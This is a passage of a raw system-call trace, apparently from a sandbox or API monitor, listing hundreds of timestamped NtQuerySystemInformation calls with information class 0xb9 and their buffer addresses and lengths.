SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x30, ResultLength=0x0) [0191.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x30, ResultLength=0x0) [0191.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x28, ResultLength=0x0) [0191.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x28, ResultLength=0x0) [0191.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x58, ResultLength=0x0) [0191.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x38, ResultLength=0x0) [0191.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0192.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0192.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0192.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0192.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0192.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x38, ResultLength=0x0) [0192.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x38, ResultLength=0x0) [0192.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x28, ResultLength=0x0) [0192.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x28, ResultLength=0x0) [0192.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x38, ResultLength=0x0) [0192.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x38, ResultLength=0x0) [0192.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x20, ResultLength=0x0) [0192.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x20, ResultLength=0x0) [0192.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x20, ResultLength=0x0) [0192.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x20, ResultLength=0x0) [0192.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x20, ResultLength=0x0) [0192.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x38, ResultLength=0x0) [0192.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0192.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0192.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0192.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0192.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x38, ResultLength=0x0) [0192.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0192.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0192.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0192.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0192.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x38, ResultLength=0x0) [0192.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0192.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd920, Length=0x20, ResultLength=0x0) [0192.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd920, Length=0x20, ResultLength=0x0) [0192.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb40, Length=0x40, ResultLength=0x0) [0192.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.399] NtQuerySystemInformation (SystemInformationClass=0xb9, 